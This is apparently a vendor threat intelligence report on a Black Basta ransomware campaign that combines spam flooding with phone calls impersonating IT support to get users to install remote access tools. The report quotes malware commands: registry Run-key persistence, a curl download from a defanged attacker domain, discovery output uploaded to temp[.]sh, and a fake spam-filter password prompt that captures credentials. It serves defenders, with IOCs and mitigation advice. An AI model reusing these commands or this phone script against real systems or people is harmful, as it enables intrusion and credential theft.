Key Points
- ReliaQuest discovered that the “Black Basta” ransomware group is conducting a mass email spam and voice phishing (vishing) campaign to deploy ransomware.
- The attack begins when a user receives a large volume of spam emails. The threat actor impersonates IT support, offering assistance and instructing the user to download a remote access tool, which grants the attacker initial access.
- Organizations should inform users to raise awareness about this campaign. They should also implement forward proxy rules to block newly registered domains and set up application whitelisting for only approved remote monitoring and management tools (RMM).
In May 2024, ReliaQuest became aware of a new mass spam and social engineering campaign being conducted by the Black Basta ransomware group. In customer incidents, ReliaQuest observed the attack beginning with a threat actor signing up a specific user’s email for newsletters, mailing lists, and other spam sources, resulting in the user receiving thousands of unwanted emails. The affected users then receive calls from the threat actor, impersonating legitimate IT staff, who persuasively guide the user to download remote access software such as Quick Assist—natively present in Windows 11—or AnyDesk, thus gaining initial access. Various industries have been targeted, indicating the campaign’s opportunistic and financially motivated nature.
Attack Flow
Users at targeted organizations receive thousands of emails, commonly from legitimate organizations’ domains. The threat actor then calls affected users and offers to provide assistance, while impersonating legitimate IT staff. The attacker instructs the user to grant them access using a RMM tool, commonly Quick Assist (Windows 11) or AnyDesk. The full attack chain is described below.
- The threat actor subscribes the user’s email to multiple newsletters and mailing lists, causing an influx of thousands of spam emails.
- Posing as IT support, the threat actor contacts the overwhelmed users, offering help to handle the email overload.
- During the conversation, the threat actor persuades the user to install legitimate remote management software, such as Quick Assist (native to Windows 11) or AnyDesk, under the pretext of resolving email issues.
- Once remote access is secured, the attacker executes batch scripts to establish a connection with their command-and-control (C2) servers and to download additional malicious files disguised as legitimate software.
- The threat actor sets up persistence on the compromised system by creating run key entries in the Windows registry through the executed scripts.
- The attacker harvests the user’s credentials, typically under the guise of needing login details to apply updates, and either exfiltrates them immediately or stores them for later retrieval.
- The threat actor attempts to move laterally within the network, deploying additional tools and attempting to execute further malicious payloads, including attempts to install Cobalt Strike beacons.
Infrastructure Analysis
Domains
Following analysis of attacker-owned infrastructure, ReliaQuest observed the threat actors creating new domains on a regular basis, following consistent naming conventions. It is likely this activity is conducted to replace old domains as they are added to threat feeds and therefore become redundant. Examples of this domain registration pattern can be found below.
Created April 18, 2024:
- upd7[.]com
Created April 26, 2024:
- upd9[.]com
Created May 2, 2024:
- upd7a[.]com
- upd7b[.]com
Created May 10, 2024:
- upd9a[.]com
- upd9b[.]com
- upd9c[.]com
Created May 15, 2024:
- upd10a[.]com
- upd10b[.]com
- upd10c[.]com
Malicious Payloads
In each instance, the threat actor on the phone to a targeted user pulls their initial malicious payload from one of the above domains. Malicious payloads are typically contained within an archive file named s.zip—we observed this filename in Case Study 2 below.
The contents of these archive files have changed throughout the attack campaign:
- The script name has changed from bat to filtersupdate.bat
- Minor changes have been made to the script itself.
- The C2 IP addresses within the script have changed.
- Passwords for the s.zip archive files have also been changing. Examples include “qaz123” and “felix333.”
- The DLL files “4.dll” and “5.dll” have been added to the script. Once executed, the DLL files are renamed and then registered as run keys for persistence using the following commands:
- MAINDIR=%LOCALAPPDATA%\FiltersUpdated
- move /Y 4.dll “%MAINDIR%\a4adwowks.dll” > nul
- set “RUN_CMD_1=rundll32 “%MAINDIR%\a4adwowks.dll”,A2WSC_IsRegistered”
- exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v smon4 /d “rundll32 \”%MAINDIR%\a4adwowks.dll\”,A2WSC_IsRegistered” /f > nul
- The script executes the below discovery commands, which are written to a file that is then added to an archive file named “update_log[dot]tar”. The TAR file is subsequently uploaded to temp[dot]sh using cURL.
- whoami /all
- net group “domain controllers” /dom
- ipconfig /all
- route PRINT
- dir “c:\Program Files (x86)”
The goal of this malicious payload is likely to steal user passwords and install a backdoor via OpenSSH and establish persistence with registry Run keys. If successful, the threat actor could return to the compromised host in the future and carry out further actions on objectives.
Case Studies
In this section, we delve into three case studies that ReliaQuest observed during this campaign. None of the cases detected by ReliaQuest escalated beyond the initial user. However, other organizations have reported similar events that eventually led to the deployment of Black Basta ransomware.
Case Study 1
An employee, registered to receive approximately 4,000 inbound emails, was targeted by a threat actor impersonating an HR representative. The threat actor convinced the user to open QuickAssist. During the interaction, the threat actor mistakenly identified themselves as IT, raising the user’s suspicions. Consequently, the user did not proceed to enter the provided code, effectively halting the attack.
Case Study 2
The threat actor utilized quickassist.exe, a Windows built-in tool, to gain remote access. During the session, the threat actor executed a command to download malicious contents:
curl -o s.zip –insecure hxxps://upd9a[.]com/update/s.zip
This command resulted in two files being written to the disk within the s.zip archive: s.tar and filtersinstall.dat. The naming convention “filtersinstall” was seemingly an attempt by the threat actor to maintain the guise of a helpdesk user running a spam filter script. Notably, the .dat file extension appeared to be a tactic for defense evasion, with subsequent file rename events to a .bat extension observed. However, filtersinstall.bat was blocked by SentinelOne, concluding the attack chain.
Further investigation involved downloading the s.zip file to a sandbox environment, cracking its password protection mechanism (password: qaz123), and reviewing the contents. The analysis revealed several indicators of compromise, including commands to set up connections with C2 IPs and additional batch files intended for persistence:
set “IPS=20.115.96[.]90 91.90.195[.]52 195.123.233[.]42”
set “BAT1=%MAINDIR%\runtimebroker.bat”
set “BAT2=%MAINDIR%\runtimebroker_connect.bat”
set “BAT2_1=%MAINDIR%\runtimebroker_connect_a.bat”
set “BAT2_2=%MAINDIR%\runtimebroker_connect_b.bat”
Case Study 3
This scenario mirrors the attack chain used against the previous case study, employing identical infrastructure. The attack was not blocked by EDR, and filtersinstall.bat successfully captured the user’s password. The script cleverly included commands that printed strings to the terminal, helping the threat actor maintain the appearance of a legitimate helpdesk worker while covertly capturing credentials:
“To update spam filters enter password for user %USERDOMAIN%\%USERNAME%”
“echo {+} Password is correct!. Finishing updates….”
“echo. Installing spam filter”
The attack was eventually neutralized when the customer reset the user’s password and session, ending the attack chain.
Threat Forecast
As the Black Basta campaign continues to leverage social engineering tactics alongside legitimate remote access tools like Quick Assist and AnyDesk, its threat to organizations remains high. This campaign adeptly manipulates human vulnerabilities by overwhelming targets with spam emails and then impersonating IT support to gain trust and system access. Given the persistent nature of these social engineering attacks, and the ongoing reliance on widely trusted remote management software, organizations are likely to face high threats from Black Basta in the short-term future. It is realistically possible that other ransomware groups could attempt to conduct attacks using similar Tactics, Techniques, and Procedures (TTPs).
What ReliaQuest Is Doing
ReliaQuest has been closely monitoring the campaign since its discovery and promptly adding indicators of compromise (IOCs) to GreyMatter threat feeds for detection. We are continuously monitoring the attacker-controlled infrastructure for changes to malicious files, and the campaign in its entirety, for new updates and responding accordingly.
Recommendations and Best Practices
In addition to implementing detection rules, defenders can take the following steps to significantly enhance the resilience of their systems against this developing threats.
- Implement policies on network proxy devices to block newly registered domains.
- Use application control policies to restrict the use of RMM to only authorized software.
- ReliaQuest customers can execute the GreyMatter Hunt package “Remote Monitoring & Management (RMM) Software” to identify current remote management software in their environment.
- Provide awareness by notifying users, IT personal, and security teams about this ongoing campaign. Remind users to only use established communication channels and procedures when in need of IT support. Any IT assistance outside of established procedures should not be trusted by users.
